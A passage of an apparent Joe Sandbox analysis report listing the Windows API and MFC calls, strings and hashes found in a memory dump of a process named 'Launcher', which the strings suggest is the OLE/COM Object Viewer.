                                                                                                    • #6211.MFC42U(0000008B,00000005,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C), ref: 00670290
                                                                                                    • #3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001), ref: 0067029D
                                                                                                    • #6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001), ref: 006702A4
                                                                                                    • #3087.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41), ref: 006702B1
                                                                                                    • #6211.MFC42U(000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41), ref: 006702B8
                                                                                                    • #3087.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 006702C5
                                                                                                    • #6211.MFC42U(000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000), ref: 006702CC
                                                                                                    • #3087.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 006702D9
                                                                                                    • #6211.MFC42U(00001FA5,00000000,000000B5,00000000,000000B1,00000000,000000B7,00000000,0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000), ref: 006702E0
                                                                                                    • #3087.MFC42U(000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 006702F1
                                                                                                    • #6211.MFC42U(000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 006702F8
                                                                                                    • #3087.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670308
                                                                                                    • #6211.MFC42U(00000089,00000005,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067030F
                                                                                                    • #3087.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 0067031C
                                                                                                    • #6211.MFC42U(000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 00670323
                                                                                                    • #3087.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C), ref: 00670330
                                                                                                    • #6211.MFC42U(0000008B,00000000,000000B6,00000000,00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C), ref: 00670337
                                                                                                    • #3087.MFC42U(000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670348
                                                                                                    • #6211.MFC42U(000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067034F
                                                                                                    • #3087.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067035C
                                                                                                    • #6211.MFC42U(00000089,00000000,000000B2,00000000,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670363
                                                                                                    • #3087.MFC42U(000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670374
                                                                                                    • #6211.MFC42U(000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067037B
                                                                                                    • #3087.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 00670388
                                                                                                    • #6211.MFC42U(00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0067038F
                                                                                                    • #3087.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 0067039C
                                                                                                    • #6211.MFC42U(000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C,00000000,00001FA5), ref: 006703A3
                                                                                                    • #3087.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C), ref: 006703B0
                                                                                                    • #6211.MFC42U(0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001,00000000,0000009C), ref: 006703B7
                                                                                                    • #3087.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001), ref: 006703C4
                                                                                                    • #6211.MFC42U(000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41,00000001,00000001), ref: 006703CB
                                                                                                    • #3087.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41), ref: 006703D8
                                                                                                    • #6211.MFC42U(000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000,?,0066FC41), ref: 006703DF
                                                                                                    • #3087.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 006703EC
                                                                                                    • #6211.MFC42U(000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005,?,00000000), ref: 006703F3
                                                                                                    • #3087.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00670400
                                                                                                    • #6211.MFC42U(00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005,000000B2,00000005), ref: 00670407
                                                                                                    • #3087.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 00670414
                                                                                                    • #6211.MFC42U(0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005,00000089,00000005), ref: 0067041B
                                                                                                    • #3087.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00670431
                                                                                                    • #2634.MFC42U(000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000,000000B6,00000005), ref: 00670438
                                                                                                    • #3087.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 00670445
                                                                                                    • #2634.MFC42U(00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000,0000008B,00000000), ref: 0067044C
                                                                                                    • #3087.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00670459
                                                                                                    • #2634.MFC42U(000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005,000000B7,00000000), ref: 00670460
                                                                                                    • #3087.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 0067046D
                                                                                                    • #2634.MFC42U(0000009C,00000000,000000B5,00000000,00001FA5,00000000,000000B1,00000000,0000009C,00000005,00001FA5,00000005,000000B5,00000005,000000B1,00000005), ref: 00670474
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #3087$#6211$#2634
                                                                                                    • String ID:
                                                                                                    • API String ID: 3514023408-0
                                                                                                    • Opcode ID: 0f30161ca70ddb8dc4359ebfdb7fb503abc32e0800b3a8bbec82a548febed1e5
                                                                                                    • Instruction ID: 2c11436a1ab0cbc2a76045b8c6e20d3b40668c6a84192f4ca1ccf2c11e8bb6ff
                                                                                                    • Opcode Fuzzy Hash: 0f30161ca70ddb8dc4359ebfdb7fb503abc32e0800b3a8bbec82a548febed1e5
                                                                                                    • Instruction Fuzzy Hash: A0417850B8076066FD9932B5086BE3E249B4BDCB45F00C8AC710A5E2D7DE6F4E1946BF

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 0066FCED
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,None), ref: 0066FD06
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,Both), ref: 0066FD19
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,Free), ref: 0066FD2C
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,Apartment), ref: 0066FD3F
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,Neutral), ref: 0066FD52
                                                                                                    • SendMessageW.USER32(?,0000133E,00000000,?), ref: 0066FD84
                                                                                                    • SendMessageW.USER32(?,0000133E,00000001,00000001), ref: 0066FD9E
                                                                                                    • SendMessageW.USER32(?,0000133E,00000002,00000001), ref: 0066FDB8
                                                                                                    • #3087.MFC42U(0000008B,00000000), ref: 0066FDC6
                                                                                                    • #2634.MFC42U(0000008B,00000000), ref: 0066FDCD
                                                                                                    • #3087.MFC42U(000000A9,00000000,0000008B,00000000), ref: 0066FDDA
                                                                                                    • #2634.MFC42U(000000A9,00000000,0000008B,00000000), ref: 0066FDE1
                                                                                                    • #3087.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 0066FDEE
                                                                                                    • #2634.MFC42U(000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 0066FDF5
                                                                                                    • LoadLibraryW.KERNEL32(OLE32.DLL,000000AC,00000000,000000A9,00000000,0000008B,00000000), ref: 0066FDFF
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoRegisterSurrogate), ref: 0066FE11
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0066FE26
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#2634#3087$Library$#4704AddressFreeLoadProc
                                                                                                    • String ID: Apartment$Both$CoRegisterSurrogate$Free$Inproc Handler$Inproc Server$Local Server$Neutral$None$OLE32.DLL
                                                                                                    • API String ID: 2746026577-3659237039
                                                                                                    • Opcode ID: a1407a59fe3a77505f6fb80b3eadf8d226f9272c98a22262349189bea5c5eb3c
                                                                                                    • Instruction ID: 15b79bd1fb100d814466a0a1299aa670cb9ff9332428f341fa7f4c0e1500828f
                                                                                                    • Opcode Fuzzy Hash: a1407a59fe3a77505f6fb80b3eadf8d226f9272c98a22262349189bea5c5eb3c
                                                                                                    • Instruction Fuzzy Hash: 59318931A002117BEB206F75DC4EEDB7E7BEF86710F011578F9195A262CBB64505CB64

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066EAED
                                                                                                    • #338.MFC42U(0000000C,0066EAD7,00000004), ref: 0066EAF7
                                                                                                    • #540.MFC42U(0000000C,0066EAD7,00000004), ref: 0066EB0B
                                                                                                    • #860.MFC42U(0066349E,0000000C,0066EAD7,00000004), ref: 0066EB27
                                                                                                    • #540.MFC42U ref: 0066EB36
                                                                                                    • #540.MFC42U ref: 0066EB42
                                                                                                    • #4155.MFC42U(00000004), ref: 0066EB50
                                                                                                    • #4155.MFC42U(00000008,00000004), ref: 0066EB5A
                                                                                                    • #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 0066EB6E
                                                                                                    • #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EB7E
                                                                                                    • #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EB8D
                                                                                                    • #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EB9D
                                                                                                    • #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EBAC
                                                                                                    • #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EBB7
                                                                                                    • #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EBBF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #3516#540$#4155#800#861$#338#860H_prolog3
                                                                                                    • String ID: ExpertMode$ViewHiddenComCats$f
                                                                                                    • API String ID: 3415677798-2566507215
                                                                                                    • Opcode ID: 967021d4570fa40a647b66ed93b14011527a91c8d05c0d701fdc649e744a9b4e
                                                                                                    • Instruction ID: 79e2815225008259ff48d95744f1f759b1d78abb33ccc0807d4b085d3dcca823
                                                                                                    • Opcode Fuzzy Hash: 967021d4570fa40a647b66ed93b14011527a91c8d05c0d701fdc649e744a9b4e
                                                                                                    • Instruction Fuzzy Hash: C7218E70A407159BDF56EFA0C856BAEBBB3AF58700F10485CF5453B2D2DBB11A08CB66

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00679205: SendMessageW.USER32(?,00001109,0067803D,00000000), ref: 00679220
                                                                                                      • Part of subcall function 00679205: #2857.MFC42U(00000000,?,0067803D,00000000,800E373A), ref: 00679227
                                                                                                    • #1662.MFC42U(00000000,800E373A), ref: 0067807F
                                                                                                      • Part of subcall function 0066E18B: SendMessageW.USER32(?,0000000B,?,00000000), ref: 0066E19A
                                                                                                    • CoCreateInstance.OLE32(006636E4,00000000,00000001,006636F4,00000000,00000000,800E373A), ref: 006780AB
                                                                                                      • Part of subcall function 00677F0B: SendMessageW.USER32(?,00001132,00000000,RHg), ref: 00677F1D
                                                                                                    • #2644.MFC42U(00000000), ref: 00678436
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#1662#2644#2857CreateInstance
                                                                                                    • String ID: All Objects$Application IDs$COM Library Objects$Grouped by Component Category$Interfaces$OLE 1.0 Objects$OLE Controls$OLE Embeddable Objects$Object Classes$Type Libraries$Unclassified Objects$g
                                                                                                    • API String ID: 2376137332-450955224
                                                                                                    • Opcode ID: ce6ba8e825d051d8d05852cefdf209e2a6e60b84bf3c0c4d4a3ff617919f8b75
                                                                                                    • Instruction ID: cf95ff4b323d20175d598fad930af2381a05f5f51745f41717cdf48fc12bd23c
                                                                                                    • Opcode Fuzzy Hash: ce6ba8e825d051d8d05852cefdf209e2a6e60b84bf3c0c4d4a3ff617919f8b75
                                                                                                    • Instruction Fuzzy Hash: 39E1DFB0E11219DFDB54EFE4C89ABAEBBB2BF44304F104429E015AB3A5DBB59845CF14

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • #3867.MFC42U(?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F09C
                                                                                                    • #3087.MFC42U(000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F0B2
                                                                                                    • #2634.MFC42U(000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F0B9
                                                                                                    • #3087.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F0C6
                                                                                                    • #2634.MFC42U(000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F0CD
                                                                                                    • #3087.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F0DA
                                                                                                    • #2634.MFC42U(00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000,00001FA5,006621A0), ref: 0066F0E1
                                                                                                    • #3087.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 0066F0EE
                                                                                                    • #2634.MFC42U(0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000,0000009C,00000000), ref: 0066F0F5
                                                                                                    • #3087.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000), ref: 0066F102
                                                                                                    • #2634.MFC42U(000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001,00000001,00000000), ref: 0066F109
                                                                                                    • #3087.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001), ref: 0066F116
                                                                                                    • #2634.MFC42U(000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000,0066FC3A,00000001), ref: 0066F11D
                                                                                                    • #3087.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 0066F12A
                                                                                                    • #2634.MFC42U(00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000,?,00000000), ref: 0066F131
                                                                                                    • #3087.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 0066F13E
                                                                                                    • #2634.MFC42U(0000009C,00000000,00001FA5,00000000,000000B1,00000000,000000B2,00000000,0000008B,00000000,00000089,00000000,000000B4,00000000,000000B3,00000000), ref: 0066F145
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2634#3087$#3867
                                                                                                    • String ID:
                                                                                                    • API String ID: 580456896-0
                                                                                                    • Opcode ID: 3d6e10d7447dc75dbe65b80ba5dfecf1493f6ae60e2c1660f6dc3d21e91d6ed4
                                                                                                    • Instruction ID: 8d5b7f7b4f6be3135969c1d448a9e318bcab2f318e77c783dbf189b365565339
                                                                                                    • Opcode Fuzzy Hash: 3d6e10d7447dc75dbe65b80ba5dfecf1493f6ae60e2c1660f6dc3d21e91d6ed4
                                                                                                    • Instruction Fuzzy Hash: B2017120F4136022DEBA3275486BABE28574FC9B90F44C89CB10E5F2D2DD6F4909829E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • #4714.MFC42U ref: 0066DA47
                                                                                                    • #2078.MFC42U(00000085,?), ref: 0066DA60
                                                                                                    • #2078.MFC42U(00000087,?,00000085,?), ref: 0066DA71
                                                                                                    • #2078.MFC42U(00000088,?,00000087,?,00000085,?), ref: 0066DA84
                                                                                                    • #2078.MFC42U(0000008B,?,00000088,?,00000087,?,00000085,?), ref: 0066DA97
                                                                                                    • #2078.MFC42U(0000008E,?,0000008B,?,00000088,?,00000087,?,00000085,?), ref: 0066DAAA
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0066DABE
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0066DAD0
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8B7
                                                                                                      • Part of subcall function 0066C8A6: ScreenToClient.USER32(?,?), ref: 0066C8C4
                                                                                                      • Part of subcall function 0066C8A6: #3133.MFC42U(?,?,?,0066C46E,?), ref: 0066C8CC
                                                                                                    • #6193.MFC42U(00000000,000000FF,?,?,?,0000001C,?), ref: 0066DB03
                                                                                                    • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?,?,0000001C,?), ref: 0066DB1B
                                                                                                    • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,000000FF,?,?), ref: 0066DB34
                                                                                                    • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 0066DB48
                                                                                                    • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 0066DB5C
                                                                                                    • #6193.MFC42U(00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8), ref: 0066DB70
                                                                                                    • #6127.MFC42U(00000001,00000001,00000001,6C9D0790,6C9D0790,00000000,00000002,00000019,000003E8,000003E8,00000000,00000000,00000002,00000019,000003E8,000003E8), ref: 0066DB84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #6193$#2078$ClientRectScreenWindow$#3133#4714#6127
                                                                                                    • String ID:
                                                                                                    • API String ID: 1113752235-0
                                                                                                    • Opcode ID: 347bd066e4dededcd6aa69a0745f99dfeb2a641c9ebc9b0047664144c0b34d55
                                                                                                    • Instruction ID: 823a27f85cfde29065608f2c7b409ef342237cc7ed1552ca33e944e224389b00
                                                                                                    • Opcode Fuzzy Hash: 347bd066e4dededcd6aa69a0745f99dfeb2a641c9ebc9b0047664144c0b34d55
                                                                                                    • Instruction Fuzzy Hash: 95414F306402047BEB60DB55DC9BFEB3A7AEB89B54F40406CB609AE1C2DE626D08C764

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 579 67bd2a-67bd31 call 67d4cd 582 67bd33-67bd40 LoadLibraryW 579->582 583 67bd80 579->583 584 67bd42-67bd49 582->584 585 67bd5e-67bd71 GetProcAddress 582->585 586 67bd4e-67bd58 MessageBoxW exit 584->586 585->583 587 67bd73-67bd7e 585->587 586->585 587->586
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067D4CD: GetVersionExW.KERNEL32(?), ref: 0067D4F3
                                                                                                    • LoadLibraryW.KERNEL32(ACLUI.DLL,0066B51D), ref: 0067BD38
                                                                                                    • MessageBoxW.USER32(00000000,Couldn't get address of EditSecurity ACLUI.DLL!,OLEViewer,00000000), ref: 0067BD50
                                                                                                    • exit.MSVCRT ref: 0067BD58
                                                                                                    • GetProcAddress.KERNEL32(00000000,EditSecurity), ref: 0067BD64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadMessageProcVersionexit
                                                                                                    • String ID: ACLUI.DLL$Couldn't get address of EditSecurity ACLUI.DLL!$Couldn't load ACLUI.DLL!$EditSecurity$OLEViewer$OleViewer
                                                                                                    • API String ID: 2950567464-1848169023
                                                                                                    • Opcode ID: a33deef34e0a003aab64a773cee3fc68177da0b0da55a61cedee968b6f3b17ac
                                                                                                    • Instruction ID: 5864d7cce6418cabde7398562cbb6ef2934ec62413b977a4135fa0877544f957
                                                                                                    • Opcode Fuzzy Hash: a33deef34e0a003aab64a773cee3fc68177da0b0da55a61cedee968b6f3b17ac
                                                                                                    • Instruction Fuzzy Hash: 87E0483038430276D7602760AD0BF2A2997AF08B02F057214F64EE41D0EFB1D4005719

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
